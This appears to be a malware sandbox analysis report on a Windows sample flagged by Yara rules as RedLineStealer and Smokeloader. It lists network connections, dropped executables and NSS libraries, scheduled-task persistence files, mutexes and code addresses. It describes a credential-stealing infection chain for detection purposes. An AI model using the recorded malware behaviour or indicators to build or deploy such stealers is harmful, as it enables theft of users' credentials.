Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:59155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59159 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63406 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63456 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63458 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63460 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63459 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63514 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.6:63518 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:63649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59333 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000024.00000002.3088875325.0000000002740000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.3085036724.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000024.00000002.3088348052.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.3085641302.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: 6SoKuOqyNh.exe	Static PE information: section name: .idata
Source: 6SoKuOqyNh.exe	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name:
Source: explorti.exe.2.dr	Static PE information: section name: .idata
Source: explorti.exe.2.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: enter[1].exe.11.dr	Static PE information: section name: .idata
Source: enter[1].exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name: .idata
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name: .idata
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name:
Source: axplong.exe.47.dr	Static PE information: section name: .idata
Source: axplong.exe.47.dr	Static PE information: section name:

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	11_2_6C6AB700
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AB8C0 rand_s,NtQueryVirtualMemory,	11_2_6C6AB8C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	11_2_6C6AB910
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	11_2_6C64F280

Creates files inside the system directory

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File created: C:\Windows\Tasks\explorti.job			Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File created: C:\Windows\Tasks\axplong.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6435A0	11_2_6C6435A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C655440	11_2_6C655440
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B545C	11_2_6C6B545C
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B542B	11_2_6C6B542B
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6BAC00	11_2_6C6BAC00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C685C10	11_2_6C685C10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C692C10	11_2_6C692C10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64D4E0	11_2_6C64D4E0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C686CF0	11_2_6C686CF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6564C0	11_2_6C6564C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66D4D0	11_2_6C66D4D0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A34A0	11_2_6C6A34A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AC4A0	11_2_6C6AC4A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C656C80	11_2_6C656C80
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65FD00	11_2_6C65FD00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C670512	11_2_6C670512
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66ED10	11_2_6C66ED10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A85F0	11_2_6C6A85F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C680DD0	11_2_6C680DD0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B6E63	11_2_6C6B6E63
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64C670	11_2_6C64C670
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C664640	11_2_6C664640
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C692E4E	11_2_6C692E4E
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C669E50	11_2_6C669E50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C683E50	11_2_6C683E50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A9E30	11_2_6C6A9E30
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C695600	11_2_6C695600
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C687E10	11_2_6C687E10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B76E3	11_2_6C6B76E3
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64BEF0	11_2_6C64BEF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65FEF0	11_2_6C65FEF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A4EA0	11_2_6C6A4EA0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6AE680	11_2_6C6AE680
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C665E90	11_2_6C665E90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C659F00	11_2_6C659F00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C687710	11_2_6C687710
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64DFE0	11_2_6C64DFE0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C676FF0	11_2_6C676FF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6977A0	11_2_6C6977A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68F070	11_2_6C68F070
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C668850	11_2_6C668850
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66D850	11_2_6C66D850
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68B820	11_2_6C68B820
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C694820	11_2_6C694820
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C657810	11_2_6C657810
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66C0E0	11_2_6C66C0E0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6858E0	11_2_6C6858E0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B50C7	11_2_6C6B50C7
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6760A0	11_2_6C6760A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65D960	11_2_6C65D960
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C69B970	11_2_6C69B970
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6BB170	11_2_6C6BB170
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C66A940	11_2_6C66A940
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64C9A0	11_2_6C64C9A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67D9B0	11_2_6C67D9B0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C685190	11_2_6C685190
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6A2990	11_2_6C6A2990
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C689A60	11_2_6C689A60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C661AF0	11_2_6C661AF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68E2F0	11_2_6C68E2F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C688AC0	11_2_6C688AC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6422A0	11_2_6C6422A0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C674AA0	11_2_6C674AA0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65CAB0	11_2_6C65CAB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B2AB0	11_2_6C6B2AB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6BBA90	11_2_6C6BBA90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C65C370	11_2_6C65C370
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C645340	11_2_6C645340
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C68D320	11_2_6C68D320
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6B53C8	11_2_6C6B53C8
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C64F380	11_2_6C64F380
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6FAC60	11_2_6C6FAC60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7CAC30	11_2_6C7CAC30
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7B6C00	11_2_6C7B6C00
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C74ECD0	11_2_6C74ECD0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6EECC0	11_2_6C6EECC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7BED70	11_2_6C7BED70
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C87CDC0	11_2_6C87CDC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C878D20	11_2_6C878D20
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C81AD50	11_2_6C81AD50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6F4DB0	11_2_6C6F4DB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C786D90	11_2_6C786D90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C78EE70	11_2_6C78EE70
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7D0E20	11_2_6C7D0E20
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6FAEC0	11_2_6C6FAEC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C790EC0	11_2_6C790EC0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C776E90	11_2_6C776E90
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7B2F70	11_2_6C7B2F70
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C838FB0	11_2_6C838FB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C75EF40	11_2_6C75EF40
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6F6F10	11_2_6C6F6F10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7CEFF0	11_2_6C7CEFF0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6F0FE0	11_2_6C6F0FE0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C830F20	11_2_6C830F20
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C6FEFB0	11_2_6C6FEFB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C7C4840	11_2_6C7C4840
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040C898	12_2_0040C898
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040E950	12_2_0040E950
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00410910	12_2_00410910
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_004109D9	12_2_004109D9
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_004105E0	12_2_004105E0
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00411580	12_2_00411580
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00410993	12_2_00410993
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00410600	12_2_00410600
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040B347	12_2_0040B347
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_0040F3C8	12_2_0040F3C8

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: String function: 6C6894D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: String function: 6C67CBE8 appears 134 times

Uses 32bit PE files

Source: 6SoKuOqyNh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000024.00000002.3088875325.0000000002740000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.3085036724.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000024.00000002.3088348052.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.3085641302.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: random[1].exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bfb8bb0dc7.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 6SoKuOqyNh.exe	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: 6SoKuOqyNh.exe	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: explorti.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: explorti.exe.2.dr	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: random[1].exe.11.dr	Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
Source: enter[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: enter[1].exe.11.dr	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
Source: axplong.exe.47.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: axplong.exe.47.dr	Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@154/216@84/22

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_6C6A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

11_2_6C6A7030

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

11_2_004190A0

Source: C:\Users\user\1000003002\d27375200a.exe

Code function: 12_2_004026B8 LoadResource,SizeofResource,FreeResource,

12_2_004026B8

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9044:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\1000003002\d27375200a.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3.dll.11.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
